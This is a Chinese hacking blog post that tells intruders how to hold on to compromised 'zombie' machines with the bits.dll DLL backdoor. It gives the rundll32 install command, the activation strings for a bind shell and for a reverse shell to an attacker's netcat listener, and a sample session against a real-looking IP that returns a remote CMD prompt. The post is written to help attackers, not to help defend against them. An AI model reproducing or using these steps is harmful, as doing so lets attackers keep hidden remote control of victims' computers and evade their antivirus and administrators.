林网博客

探讨计算机网络安全 拓展计算机网络应用

« 【全球ip段!】扫描必备!再谈3389 »

如何保护肉鸡

随着国内网民的安全意识的提高我们的肉鸡很难在得手了.即使到手也会在很短的时间内丢失,使众黑客们心痛至极.然后想尽一切办法为肉鸡安装多个后门添加N个隐藏管理员但还是被强力的杀毒软件或聪明的网管让我们宝贝在次的丢失.但是黑民们要记住在黑客界每天都有新的技术出现.下面我就向大家介绍一种很好的后门技术DLL插入型后门.它的好处就是不会开放端口.不会在进程中出现.很多黑民们都会有疑问dll怎么实现后门的呢 .dll又不是exe程序可以启动怎么会有这么大的功能呢.答:因为dll后门不是靠自身启动的.大家应该知道exe程序在运行的时候可以调用dll文件..哪么程序员在写程序的时候只要在dll中修改一些变量就可以将dll绑定到一些系统的服务中启到后门的作用.下面我就介绍一个国内著名黑客小榕的dll后门作品bits.dll其实使用很简单

首先将bits.dll上传到肉鸡上使用administrator或者localsysytem进行

安装

使用命令:rundll32.exe BITS.dll,Install <Active Strings>

Active Strings是用户自己指定的一个特征字符串,用于激活BITS。

安装成功后就可以进行联接了

正向连接:

1、用nc连接目标主机的任何一个TCP端口(80/139/445.....)
2、按照以下格式输入激活命令
<Active Strings>@dancewithdolphin[xell]:<PORT>
例如,在安装的时候设定了Active Strings为BITS Door,将CMD绑定在端口99:
BITS Door@dancewithdolphin[xell]:99

这样目标主机就会将CMD绑定在99。
3、连接目标主机的指定端口(上例中为99)


反向连接:

很多情况下主机是在防火墙后面的,这样就需要用反向连接。

1、在本地使用NC监听(如:nc -l -p 1234)
2、用nc连接目标主机的任何一个防火墙允许的TCP端口(80/139/445.....)
3、按照以下格式输入激活命令
<Active Strings>@dancewithdolphin[rxell]:<Your IP>:<Listen Port>
例如,在安装的时候设定了Active Strings为BITS Door,本机地址为1.1.1.1, nc在1234
端口监听:
BITS Door@dancewithdolphin[rxell]:1.1.1.1:1234
4、目标主机的CMD将会出现在NC监听的端口1234。

注意:所有的输入都区分大小写。

例:

C:\My Documents>nc 219.237.63.199 139
securitystrings@dancewithdolphin[xell]:7
?

C:\My Documents>nc 219.237.63.199 7
廙icrosoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>

祝大家好运


订阅我的博客 免费订阅林网博客 欣赏更多博客精品

本文链接地址:http://www.linwan.net.cn/archives/106.html
原创文章如转载,请注明:转载自林网博客 [ http://www.linwan.net.cn/ ]
  • 文章排行
  • 完全文章排行 随机文章排行 文章本月排行 文章本年排行
  • 相关文章():

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

订阅博客

  • 订阅我的博客:订阅我的博客
  • 通过Google订阅本站
  • 通过抓虾订阅本站
  • 通过鲜果订阅本站
  • 通过bloglines订阅本站
  • 订阅本站到飞豆
  • 订阅本站到哪吒
  • 通过电子邮件订阅本站

热文排行使用

最新评论及回复

最新文章

累计排行

林海谐缘软件区新贴

林海谐缘网络区新贴

联系邮箱:16881688&126[AT]com,Powered By Z-Blog 1.8 Spirit Build 80710

本站采用创作共用版权协议, 要求署名、非商业用途和保持一致. 转载本站内容必须也遵循“署名-非商业用途-保持一致”的创作共用协议.